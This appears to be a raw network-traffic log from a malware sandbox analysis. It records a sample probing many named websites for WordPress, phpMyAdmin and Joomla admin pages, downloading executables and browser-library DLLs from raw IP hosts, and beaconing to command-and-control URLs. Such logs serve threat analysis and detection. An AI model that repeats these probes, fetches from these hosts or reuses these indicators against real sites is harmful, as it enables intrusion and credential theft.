Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=mruul8ldluhskqv1trt26ro4ujUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fksv-schwimmen.de%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ksv-schwimmen.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=1jcqg67re2d1lpt5kl3hrj1r8hUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=2ppcq4e78r9u2d410k2iavqo3nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=q2ph1u7ied1kb5jksttv46bm67User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
Source: global traffic	HTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
Source: global traffic	HTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mobile.sunaviat.com
Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: protonmail.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ef968548815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef9d9e3ccc6b951e HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.sgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: veselcontractors.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: veselcontractors.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://veselcontractors.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://touktoukcie.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://sportclinic.co.il/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://derbyron.de/administrator/
